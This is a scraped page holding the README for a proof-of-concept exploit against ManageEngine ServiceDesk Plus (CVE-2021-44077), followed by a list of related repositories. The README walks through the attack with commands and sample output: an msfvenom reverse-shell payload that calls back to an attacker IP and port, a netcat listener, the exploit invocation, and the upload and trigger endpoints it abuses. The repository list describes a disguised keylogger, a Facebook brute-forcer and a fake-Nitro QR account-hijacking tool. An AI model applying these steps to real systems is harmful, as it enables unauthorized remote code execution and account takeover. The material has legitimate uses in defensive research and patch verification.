Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077

Related tags

Security related resourcesCVE-2021-44077
Overview

CVE-2021-44077

Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306

Based on:

CISA Advisory:

Remediation (Update to build 11306 or later):

Tested on ManageEngine ServiceDesk Plus Build 11303. Disabled all AV.

Usage

The exploit uploads a Windows executable to the target and executes it.

To exploit, first generate any executable. For instance:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe

pip install the requirements file or make sure you've got the requests package.

If you're trying to catch a reverse shell, run your listener first, e.g.

nc -l 4444

Then run the exploit script, passing in the url and exe arguments, e.g.

python exploit.py http://
   
    :

Example script output:

% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

Proof

Exploit Notes

  • The vulnerability you to upload any file to the install bin directory, including existing files such as batch scripts. There may be other ways to invoke the uploaded file.
  • Directly uploading a web shell seems to be prevented by a filter.

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

Owner
Horizon 3 AI Inc
AI-powered Pen Tests. See your enterprise through the eyes of an attacker & fix what matters.
Horizon 3 AI Inc
GitHub Repository
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Wade 1 Dec 15, 2021
Um keylogger que se disfarça de um app que tira print da tela.

Keylogger_ Um keylogger que se disfarça de um app que tira print da tela. Este programa captura o print da tela e salva ,normalmente, na pasta Picture

Marcus Vinícius Ribeiro Andrade 1 Dec 03, 2021
How to exploit a double free vulnerability in 2021. 'Use-After-Free for Dummies'

This bug doesn’t exist on x86: Exploiting an ARM-only race condition How to exploit a double free and get a shell. "Use-After-Free for dummies" In thi

Stephen Tong 1.2k Dec 25, 2022
Dapunta Multi Brute Force Facebook - Crack Facebook With Login - Free

✭ DMBF CRACK Dibuat Dengan ❤️ Oleh Dapunta Author: - Dapunta Khurayra X ⇨ Fitur Login [✯] Login Token ⇨ Fitur Crack [✯] Crack Dari Teman, Public,

Dapunta ID 10 Oct 19, 2022
Infoga is a tool gathering email accounts informations (ip,hostname,country,...) from different public source

Infoga - Email OSINT Infoga is a tool gathering email accounts informations (ip,hostname,country,...) from different public source (search engines, pg

m4ll0k (mallok) 1.8k Jan 04, 2023
Enhancing Twin Delayed Deep Deterministic Policy Gradient with Cross-Entropy Method

Enhancing Twin Delayed Deep Deterministic Policy Gradient with Cross-Entropy Method Hieu Trung Nguyen, Khang Tran and Ngoc Hoang Luong Setup Clone thi

Evolutionary Learning & Optimization (ELO) Lab 6 Jun 29, 2022
HTTP Protocol Stack Remote Code Execution Vulnerability CVE-2022-21907

CVE-2022-21907 Description POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability. create by antx at 2022-01-17. Detail HTTP

赛欧思网络安全研究实验室 365 Nov 30, 2022
Malware-analysis-writeups - Some of my Malware Analysis writeups

About This repo contains some malware analysis writeups i've created over time m

Itay Migdal 14 Jun 22, 2022
Everything I needed to understand what was going on with "Spring4Shell" - translated source materials, exploit, links to demo apps, and more.

springcore-0day-en These are all my notes from the alleged confirmed! 0day dropped on 2022-03-29. This vulnerability is commonly referred to as "Sprin

Chris Partridge 105 Nov 26, 2022
Automated tool to find & created Exploit Poc for Clickjacking Vulnerability

ClickJackPoc This tool will help you automate finding Clickjacking Vulnerability by just passing a file containing list of Targets . Once the Target i

Chirag Agrawal 24 Dec 19, 2022
Early days of an Asset Discovery tool.

Please star this project! Written in Python Report Bug . Request Feature DISCLAIMER This project is in its early days, everything you see here is almo

grag1337 3 Dec 20, 2022
Operational information regarding the vulnerability in the Log4j logging library.

Log4j Vulnerability (CVE-2021-44228) This repo contains operational information regarding the vulnerability in the Log4j logging library (CVE-2021-442

Nationaal Cyber Security Centrum (NCSC-NL) 1.9k Dec 26, 2022
A deobfuscator for multiple python obfuscators

PY4COC A deobfuscator for multiple python obfuscators, supports exe's packed with pyinstaller too. How to use python3 py4coc.py exe file or py file o

svenskithesource 16 Dec 03, 2022
Website OSINT untuk mencari informasi dari email dan nomor telepon. Dibuat dengan React dan Flask.

Inspektur Cari informasi mengenai email dan nomor telepon dengan mudah. Inspektur adalah aplikasi OSINT yang berguna untuk mencari informasi berdasark

Bagas Wastu 36 Dec 04, 2022
A Python tool to automate some dorking stuff to find information disclosures.

WebDork v1.0.3 A open-source tool to find publicly available sensitive information about Companies/Organisations! WebDork A Python tool to automate so

Rahul rc 123 Jan 08, 2023
Python exploit for vsftpd 2.3.4 - Backdoor Command Execution

CVE-2011-2523 - vsftpd 2.3.4 Exploit Discription vsftpd, which stands for Very Secure FTP Daemon,is an FTP server for Unix-like systems, including Lin

Padsala Tushal 5 Nov 08, 2022
Security System using OpenCV

Security-System Security System using OpenCV Files in this Repository: email_send.py - This file contains python code to send an email when something

Mehul Patwari 1 Oct 28, 2021
xkeysnail is yet another keyboard remapping tool for X environment written in Python

xkeysnail is yet another keyboard remapping tool for X environment written in Python. It's like xmodmap but allows more flexible remappings.

Masafumi Oyamada 809 Dec 26, 2022
Hack any account sending fake nitro QR code (only for educational purpose)

DISCORD_ACCOUNT_HACKING_TOOL ( EDUCATIONAL PURPOSE ) Hack any account sending fake nitro QR code (only for educational purpose) Start my program token

Novy 7 Jan 07, 2022
A Python application to predict what is cooking

ez-cuisine-classifier A Python application to predict what is cooking Environment Python 3.9 Windows 10 Install python -m venv venv .\venv\Scripts\act

Zeheng Li 1 Jun 21, 2022